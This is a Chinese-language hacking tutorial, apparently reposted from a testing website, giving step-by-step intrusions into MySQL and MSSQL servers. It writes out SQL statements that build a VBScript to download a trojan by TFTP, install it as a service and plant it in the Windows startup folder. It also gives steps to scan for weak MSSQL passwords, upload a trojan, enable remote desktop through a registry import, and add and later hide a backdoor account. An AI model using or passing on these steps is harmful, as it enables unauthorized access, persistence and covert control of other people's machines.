mysql入侵
在mysql入侵中我用到了hotmail的 wineggdropshell v1.35,本人认为是众我版本中最稳定的版本
为了方便输入我把它改名win135.exe
[1]用mysql连接你拥有用户名和密码的远程mysql数库.
[2]新建一个数据表后,安格式把下面两行语句写到新建的数据表中假如你新建的数据表为aa,
(1)insert into aa values ("set wshshell=createobject (""wscript.shell"")");
(2)insert into aa values ("a=wshshell.run (""cmd.exe /c (tftp -i 127.0.0.1 get win135.exe c:\\windows\\system32\\win135.exe && c:\\windows\\system32\\win135.exe -install) && (net start win135)"",0)");
上面的语句是利用脚本调用dos命令中的条件命令,意思是:从tftp服务器下载win135.exe 如果成功就安装win135服务其它退出
如果安装win135服务成功就启动win135服务,其它退出.注意,第二条语句比较长,但不要把第二条语句包含的几条命令分开处理
如果分开处理就会出现win135还没下载下来就执行其它命令这样会出错误,你可以用脚本新建一用户名,但没用的,因为有xp的用
户名并不一定能登陆,本脚本的好处在于能自动下载木马程序并运行,只要对方重启,你就可以用木马的system权限登陆以方主机
再下载3389.reg用regedit /s 3389.reg开启对方的3389,新建用户名后用3389登陆,至于怎样令xp重启就不用我说了吧,另外你的tftp服务器要保证在线
[3]把新建的数据表为脚本文件并导出到启动项:
select * from aa into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\aa.vbs";
[4]保存成功后,只要对方重启你就可以用木马登陆了
mssql入侵,最经典不过了
[1]扫描1433端口开放的主机,用raptor制作一个纯ip文本
[2]导入scanner扫描开放5000端口的主机
[3]把开放5000端口的主机再制作一个纯ip文本
[4]导入x-scan中扫描mssql弱口令
[5]用sqlexec连接带有弱口令的主机
[6]用tftp上传木马
[7]用木马的system权限登陆后,再上传3389.reg
[8]用regedit /s 3389.reg 命令开启终端
[9]建一用户名后,可以用3389客户端登陆了
[10]用3389登陆后.别忘了册掉新建的用户,因为xp登陆对话框中会把新建的用户显示出来.
//
延伸阅读
文章来源于领测软件测试网 https://www.ltesting.net/
